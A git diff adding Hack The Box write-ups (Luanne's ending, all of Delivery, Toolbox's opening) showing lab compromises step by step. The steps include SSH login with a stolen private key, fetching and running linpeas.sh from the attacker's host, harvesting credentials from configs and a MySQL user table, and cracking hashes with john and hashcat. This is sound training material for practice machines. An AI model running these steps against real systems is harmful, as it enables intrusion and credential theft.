+ N+59o58CG82wvGl2RnwIpIOIFPoQyim/T0q0FN6CIFe6csJg8RDdvq2NaD6k6vKSk6rRgo
+ IH3BXK8fc7hLQw58o5kwdFakClbs/q9+Uc7lnDBmo33ytQ9pqNVuu6nxZqI2lG88QvWjPg
+ nUtRpvXwMi0/QMLzzoC6TJwzAn39GXAAAAwQDVMhwBL97HThxI60inI1SrowaSpMLMbWqq
+ 189zIG0dHfVDVQBCXd2Rng15eN5WnsW2LL8iHL25T5K2yi+hsZHU6jJ0CNuB1X6ITuHhQg
+ QLAuGW2EaxejWHYC5gTh7jwK6wOwQArJhU48h6DFl+5PUO8KQCDBC9WaGm3EVXbPwXlzp9
+ 9OGmTT9AggBQJhLiXlkoSMReS36EYkxEncYdWM7zmC2kkxPTSVWz94I87YvApj0vepuB7b
+ 45bBkP5xOhrjMAAAAVci5taWNoYWVsc0BsdWFubmUuaHRiAQIDBAUG
+ -----END OPENSSH PRIVATE KEY-----
+
+
+
+And there you go ! now let's login as the r.michaels user via ssh:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → vim id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → file id_rsa
+ id_rsa: OpenSSH private key
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → chmod 600 id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → ssh r.michaels@10.10.10.218 -i id_rsa
+ The authenticity of host '10.10.10.218 (10.10.10.218)' can't be established.
+ ECDSA key fingerprint is SHA256:KB1gw0t+80YeM3PEDp7AjlTqJUN+gdyWKXoCrXn7AZo.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.218' (ECDSA) to the list of known hosts.
+ Last login: Fri Sep 18 07:06:51 2020
+ NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020
+
+ Welcome to NetBSD!
+
+ luanne$ id
+ uid=1000(r.michaels) gid=100(users) groups=100(users)
+ luanne$ ls
+ backups devel public_html user.txt
+ luanne$ cat user.txt
+ eaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you go! We managed to login as the r.michaels user and print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that's done, let's run linpeas again as the r.michaels user:
+
+
+ luanne$ curl http://10.10.14.13:9090/linpeas.sh > /tmp/peas.sh
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 333k 100 333k 0 0 899k 0 --:--:-- --:--:-- --:--:-- 899k
+ luanne$ chmod +x /tmp/peas.sh
+ luanne$ /tmp/peas.sh
+
+
+
+Now as we scroll through the output, we see the following backup file:
+
+
+
+Here we have doas, an alternative to the sudo command, scrolling further we see an encrypted backup file:
+
+
+
+Since this is a NetBSD box, we can decrypt it with **netpgp** :
+
+
+ luanne$ ls
+ backups devel public_html user.txt
+ luanne$ cd backups/
+ luanne$ ls -l
+ total 4
+ -r-------- 1 r.michaels users 1970 Nov 24 2020 **devel_backup-2020-09-16.tar.gz.enc**
+
+ luanne$ **netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/backup.tar.gz**
+ signature 2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14
+ Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a
+ uid RSA 2048-bit key <****r.michaels@localhost>
+
+ luanne$ cd /tmp
+ luanne$ tar -xvf backup.tar.gz
+ x devel-2020-09-16/
+ x devel-2020-09-16/www/
+ x devel-2020-09-16/webapi/
+ x devel-2020-09-16/webapi/weather.lua
+ x devel-2020-09-16/www/index.md
+ x devel-2020-09-16/www/.htpasswd
+ luanne$ cat devel-2020-09-16/www/.htpasswd
+ webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
+
+Once the backup is extracted, we see that we get another password hash for the webapi_user so let's crack it with john just like the previous one:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Luanne]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu
+
+ Not Found.
+ --------------------------------------------------
+ HASH: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
+
+ Possible Hashs:
+ [+] MD5(Unix)
+ --------------------------------------------------
+
+
+Make sure you include the **.** at the end, it is actually part of the hash:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Luanne]
+ → cat hash2
+ $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Luanne]
+ → john -w=/usr/share/wordlists/rockyou.txt hash2
+ Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
+ Use the "--format=md5crypt-long" option to force loading these as that type instead
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ **littlebear (?)**
+ 1g 0:00:00:00 DONE (2021-06-06 11:18) 11.11g/s 145066p/s 145066c/s 145066C/s jayar..hello11
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+And there we go! We managed to get the second webapi_user password, let's test if we can privesc to the root user with the doas binary we found earlier:
+
+
+
+ luanne$ doas su
+ Password:
+ # id
+ uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
+ # cat /root/root.txt
+ 7aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user and print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/55.md b/Easy/55.md
new file mode 100644
index 0000000..224e94e
--- /dev/null
+++ b/Easy/55.md
@@ -0,0 +1,469 @@
+# Delivery Writeup
+
+
+
+## Introduction :
+
+Delivery is an Easy Linux box released back in January 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ → nmap -vvv -p- 10.10.10.222 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.222
+ Discovered open port 22/tcp on 10.10.10.222
+ Discovered open port 8065/tcp on 10.10.10.222
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ → nmap -sCV -p 80,22,8065 10.10.10.222
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 16:42 CEST
+ Nmap scan report for 10.10.10.222
+ Host is up (0.025s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
+ | 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
+ |_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
+ 80/tcp open http nginx 1.14.2
+ |_http-server-header: nginx/1.14.2
+ |_http-title: Welcome
+ 8065/tcp open unknown
+ | fingerprint-strings:
+ | GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
+ | HTTP/1.1 400 Bad Request
+ | Content-Type: text/plain; charset=utf-8
+ | Connection: close
+ | Request
+ | GetRequest:
+ | HTTP/1.0 200 OK
+ | Accept-Ranges: bytes
+ | Cache-Control: no-cache, max-age=31556926, public
+ | Content-Length: 3108
+ | Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
+ | Content-Type: text/html; charset=utf-8
+ | Last-Modified: Sun, 06 Jun 2021 12:18:32 GMT
+ | X-Frame-Options: SAMEORIGIN
+ | X-Request-Id: w1jipf17ppy1tgk63mkqqkxn1h
+ | X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
+ | Date: Sun, 06 Jun 2021 14:50:30 GMT
+ | HTTPOptions:
+ | HTTP/1.0 405 Method Not Allowed
+ | Date: Sun, 06 Jun 2021 14:50:30 GMT
+ |_ Content-Length: 0
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port8065-TCP:V=7.91%I=7%D=6/6%Time=60BCDEDC%P=x86_64-pc-linux-gnu%r(Gen
+ SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
+ SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
+ SF:0Request")%r(GetRequest,DF3,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges:\x
+ SF:20bytes\r\nCache-Control:\x20no-cache,\x20max-age=31556926,\x20public\r
+ SF:\nContent-Length:\x203108\r\nContent-Security-Policy:\x20frame-ancestor
+ SF:s\x20'self';\x20script-src\x20'self'\x20cdn\.rudderlabs\.com\r\nContent
+ SF:-Type:\x20text/html;\x20charset=utf-8\r\nLast-Modified:\x20Sun,\x2006\x
+ SF:20Jun\x202021\x2012:18:32\x20GMT\r\nX-Frame-Options:\x20SAMEORIGIN\r\nX
+ SF:-Request-Id:\x20w1jipf17ppy1tgk63mkqqkxn1h\r\nX-Version-Id:\x205\.30\.0
+ SF:\.5\.30\.1\.57fb31b889bf81d99d8af8176d4bbaaa\.false\r\nDate:\x20Sun,\x2
+ SF:006\x20Jun\x202021\x2014:50:30\x20GMT\r\n\r\n!doctype\x20html>html\x2
+ SF:0lang=\"en\">head>meta\x20charset=\"utf-8\">meta\x20name=\"viewport\
+ SF:"\x20content=\"width=device-width,initial-scale=1,maximum-scale=1,user-
+ SF:scalable=0\">meta\x20name=\"robots\"\x20content=\"noindex,\x20nofollow
+ SF:\">meta\x20name=\"referrer\"\x20content=\"no-referrer\">title>Matterm
+ SF:ost/title>meta\x20name=\"mobile-web-app-capable\"\x20content=\"yes\">
+ SF:meta\x20name=\"application-name\"\x20content=\"Mattermost\">meta\x20n
+ SF:ame=\"format-detection\"\x20content=\"telephone=no\">link\x20re")%r(HT
+ SF:TPOptions,5B,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nDate:\x20
+ SF:Sun,\x2006\x20Jun\x202021\x2014:50:30\x20GMT\r\nContent-Length:\x200\r\
+ SF:n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
+ SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
+ SF:00\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
+ SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\
+ SF:r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20
+ SF:Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConn
+ SF:ection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,
+ SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
+ SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 91.89 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it:
+
+
+
+here we are hinted towards the domain name **helpdesk.delivery.htb** so let's add both the domain name and the subdomain to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.222 delivery.htb helpdesk.delivery.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 delivery.htb
+ PING delivery.htb (10.10.10.222) 56(84) bytes of data.
+ 64 bytes from delivery.htb (10.10.10.222): icmp_seq=1 ttl=63 time=25.8 ms
+
+ --- delivery.htb ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 25.761/25.761/25.761/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 helpdesk.delivery.htb
+ PING delivery.htb (10.10.10.222) 56(84) bytes of data.
+ 64 bytes from delivery.htb (10.10.10.222): icmp_seq=1 ttl=63 time=29.8 ms
+
+ --- delivery.htb ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 29.791/29.791/29.791/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ →
+
+
+Delivery.htb is apparently the same website we found earlier, now let's take a look at helpdesk.delivery.htb:
+
+
+
+Here we see that we are on an **osTicket** instance, let's see if we can create a ticket as a guest user:
+
+
+
+We see that our ticket is created successfully:
+
+
+
+Here we are given an email address that has the ticket number in it, so it might be of use later, and we can check the status of our ticket:
+
+ 
+
+Now our nmap scan also picked up port 8065, so let's investigate it:
+
+
+
+Here we see that we are on a Mattermost instance, so let's create an account:
+
+
+
+Let's create an account with the ticket email address that we got provided earlier **9454299@delivery.htb** username **nihilist777** password **TestTest123*** :
+
+
+
+Here we see that we need to check the inbox:
+
+
+
+We get the following message:
+
+
+ ---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token=3my3bfb461ko6q34r68mmbypuxrfbt8trmgewq5jefyy8xhbcckgyu86ozbyc8pw&email;=9454299%40delivery.htb ) --------------------- You can sign in from: --------------------- Mattermost lets you share messages and files from your PC or phone, with instant search and archiving. For the best experience, download the apps for PC, Mac, iOS and Android from: https://mattermost.com/download/#mattermostApps ( https://mattermost.com/download/#mattermostApps
+
+
+so we go to **http://delivery.htb:8065/do_verify_email?token=3my3bfb461ko6q34r68mmbypuxrfbt8trmgewq5jefyy8xhbcckgyu86ozbyc8pw &email;=9454299%40delivery.htb** to activate the mattermost account and login:
+
+
+
+**9454299@delivery.htb TestTest123***. Once logged in in the internal chatroom, we see that the root user posted credentials to access the server:
+
+
+
+So let's try to login via SSH to the server with the **maildeliverer:Youve_G0t_Mail!** credentials:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Delivery]
+ → ssh maildeliverer@delivery.htb
+ The authenticity of host 'delivery.htb (10.10.10.222)' can't be established.
+ ECDSA key fingerprint is SHA256:LKngIDlEjP2k8M7IAUkAoFgY/MbVVbMqvrFA6CUrHoM.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'delivery.htb,10.10.10.222' (ECDSA) to the list of known hosts.
+ maildeliverer@delivery.htb's password:
+ Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
+
+ The programs included with the Debian GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ Last login: Tue Jan 5 06:09:50 2021 from 10.10.14.5
+ maildeliverer@Delivery:~$ id
+ uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
+ maildeliverer@Delivery:~$ ls
+ user.txt
+ maildeliverer@Delivery:~$ cat user.txt
+ d6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that we're on the box as the mailedliverer user, let's enumerate the box:
+
+
+ maildeliverer@Delivery:~$ which wget curl python python3 nc
+ /usr/bin/wget
+ /usr/bin/curl
+ /usr/bin/python
+ /usr/bin/python3
+ /usr/bin/nc
+
+
+
+let's get linpeas.sh onto the box:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ maildeliverer@Delivery:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-07 06:23:56-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[======================================================================================================================================================>] 333.85K 2.03MB/s in 0.2s
+
+ 2021-06-07 06:23:56 (2.03 MB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ maildeliverer@Delivery:~$ chmod +x /tmp/peas.sh
+ maildeliverer@Delivery:~$ /tmp/peas.sh
+
+
+
+` 
+
+Now let linpeas.sh run and then scrolling through it's output you will stumble upon mysql:
+
+
+
+And obviously as we saw earlier, there is a mattermost instance running:
+
+
+
+It's in **/opt/mattermost** so let's check it out:
+
+
+ maildeliverer@Delivery:~$ cd /opt/mattermost
+ maildeliverer@Delivery:/opt/mattermost$ ls -lash
+ total 288K
+ 4.0K drwxrwxr-x 12 mattermost mattermost 4.0K Dec 26 09:24 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Dec 26 09:22 ..
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:53 bin
+ 4.0K drwxrwxr-x 7 mattermost mattermost 4.0K Dec 26 09:24 client
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 09:23 config
+ 4.0K drwxrwxr-x 3 mattermost mattermost 4.0K Jun 7 05:15 data
+ 4.0K -rw-rw-r-- 1 mattermost mattermost 2.1K Dec 18 08:52 ENTERPRISE-EDITION-LICENSE.txt
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:52 fonts
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:52 i18n
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 09:23 logs
+ 4.0K -rw-rw-r-- 1 mattermost mattermost 898 Dec 18 08:52 manifest.txt
+ 224K -rw-rw-r-- 1 mattermost mattermost 224K Dec 18 08:52 NOTICE.txt
+ 4.0K drwxr--r-- 5 mattermost mattermost 4.0K Jun 7 05:44 plugins
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:53 prepackaged_plugins
+ 8.0K -rw-rw-r-- 1 mattermost mattermost 6.2K Dec 18 08:52 README.md
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 08:52 templates
+ maildeliverer@Delivery:/opt/mattermost$ ls -lash config/
+ total 36K
+ 4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 09:23 .
+ 4.0K drwxrwxr-x 12 mattermost mattermost 4.0K Dec 26 09:24 ..
+ 4.0K -rw-rw-r-- 1 mattermost mattermost 922 Dec 18 08:52 cloud_defaults.json
+ 20K -rw-rw-r-- 1 mattermost mattermost 19K Jun 7 05:15 config.json
+ 4.0K -rw-rw-r-- 1 mattermost mattermost 243 Dec 18 08:52 README.md
+ maildeliverer@Delivery:/opt/mattermost$ cat config/config.json
+
+
+Here there is a config json file, and when we peek into it, we see the following:
+
+
+ maildeliverer@Delivery:/opt/mattermost/config$ grep -A12 -i 'SqlSettings' config.json
+ "SqlSettings": {
+ "DriverName": "mysql",
+ "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
+ "DataSourceReplicas": [],
+ "DataSourceSearchReplicas": [],
+ "MaxIdleConns": 20,
+ "ConnMaxLifetimeMilliseconds": 3600000,
+ "MaxOpenConns": 300,
+ "Trace": false,
+ "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
+ "QueryTimeout": 30,
+ "DisableDatabaseSearch": false
+ },
+
+
+
+Here we get the MySQL credentials **mmuser:Crack_The_MM_Admin_PW** , and an obvious hint that we need to crack the password we're about to find in the MySQL database:
+
+
+ maildeliverer@Delivery:/opt/mattermost/config$ mysql -u 'mmuser' -p
+ Enter password:
+ Welcome to the MariaDB monitor. Commands end with ; or \g.
+ Your MariaDB connection id is 75
+ Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
+
+ Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ MariaDB [(none)]> show databases;
+ +--------------------+
+ | Database |
+ +--------------------+
+ | information_schema |
+ | mattermost |
+ +--------------------+
+ 2 rows in set (0.001 sec)
+
+ MariaDB [(none)]> use mattermost;
+ Reading table information for completion of table and column names
+ You can turn off this feature to get a quicker startup with -A
+
+ Database changed
+ MariaDB [mattermost]> select USERNAME,Password FROM Users;
+ +----------------------------------+--------------------------------------------------------------+
+ | USERNAME | Password |
+ +----------------------------------+--------------------------------------------------------------+
+ |**nihilist777 | $2a$10$dY8WN1vLdd0ZlEd0m53.ouWZXUVIgFHvMguur2g11CwssN0CdZA8q** |
+ | surveybot | |
+ | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
+ | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
+ |**root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO** |
+ | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
+ | channelexport | |
+ | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+ +----------------------------------+--------------------------------------------------------------+
+ 8 rows in set (0.000 sec)
+
+
+Here we see our account's hashed password, but we also see the root user's hashed password, so let's save it locally:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → vim roothash
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → cat roothash
+ $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
+
+ Not Found.
+ --------------------------------------------------
+
+
+Suprisingly hash-id can't identify the type of hash here, so let's identify it [online](https://hashes.com/en/tools/hash_identifier):
+
+
+
+So now we know that this is probably the **bcrypt $2*$** or **Blowfish (Unix)** algorithms. Looking back at the conversation we saw earlier, we remember that the root user was talking about the **PleaseSubscribe!** password "variant"
+
+
+
+So we can assume that the password used here is **PleaseSubscribe!** with some extra characters after it. Let's test that out with hashcat:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → echo 'PleaseSubscribe!' > pass.lst
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → cat pass.lst
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → hashcat --stdout pass.lst -r /usr/share/hashcat/rules/best64.rule > custom.lst
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → hashcat -m 3200 -a 3 "$(cat roothash)" custom.lst
+ hashcat (v6.1.1) starting...
+
+ [...]
+
+ The wordlist or mask that you are using is too small.
+ This means that hashcat cannot use the full parallel power of your device(s).
+ Unless you supply more work, your cracking speed will drop.
+ For tips on supplying more work, see: https://hashcat.net/faq/morework
+
+ Approaching final keyspace - workload adjusted.
+
+ **$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21**
+
+ Session..........: hashcat
+ Status...........: Cracked
+ Hash.Name........: bcrypt $2*$, Blowfish (Unix)
+ Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
+ Time.Started.....: Mon Jun 7 12:42:41 2021 (1 sec)
+ Time.Estimated...: Mon Jun 7 12:42:42 2021 (0 secs)
+ Guess.Mask.......: PleaseSubscribe!21 [18]
+ Guess.Queue......: 21/77 (27.27%)
+ Speed.#1.........: 1 H/s (2.61ms) @ Accel:2 Loops:4 Thr:12 Vec:1
+ Recovered........: 1/1 (100.00%) Digests
+ Progress.........: 1/1 (100.00%)
+ Rejected.........: 0/1 (0.00%)
+ Restore.Point....: 0/1 (0.00%)
+ Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1020-1024
+ Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
+ Hardware.Mon.#1..: Temp: 41c Fan: 0% Util:100% Core:1797MHz Mem:3504MHz Bus:16
+
+ Started: Mon Jun 7 12:42:20 2021
+ Stopped: Mon Jun 7 12:42:43 2021
+
+
+And we found the password! **PleaseSubscribe!21** so let's try to login as the root user:
+
+
+ maildeliverer@Delivery:/opt/mattermost/config$ su
+ Password:
+ root@Delivery:/opt/mattermost/config# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@Delivery:/opt/mattermost/config# cat /root/root.txt
+ c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user, and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/56.md b/Easy/56.md
new file mode 100644
index 0000000..16e28c3
--- /dev/null
+++ b/Easy/56.md
@@ -0,0 +1,478 @@
+# Toolbox Writeup
+
+
+
+## Introduction :
+
+Toolbox is an easy Windows box released back in March 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → nmap -vvv -p- 10.10.10.236 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 21/tcp on 10.10.10.236
+ Discovered open port 443/tcp on 10.10.10.236
+ Discovered open port 135/tcp on 10.10.10.236
+ Discovered open port 22/tcp on 10.10.10.236
+ Discovered open port 139/tcp on 10.10.10.236
+ Discovered open port 445/tcp on 10.10.10.236
+ Discovered open port 47001/tcp on 10.10.10.236
+ Discovered open port 5985/tcp on 10.10.10.236
+ Discovered open port 49668/tcp on 10.10.10.236
+ Discovered open port 49666/tcp on 10.10.10.236
+ Discovered open port 49667/tcp on 10.10.10.236
+ Discovered open port 49665/tcp on 10.10.10.236
+ Discovered open port 49669/tcp on 10.10.10.236
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → nmap -sCV -p 21,22,135,139,445,443 10.10.10.236
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-07 17:43 CEST
+ Nmap scan report for 10.10.10.236
+ Host is up (0.027s latency).
+
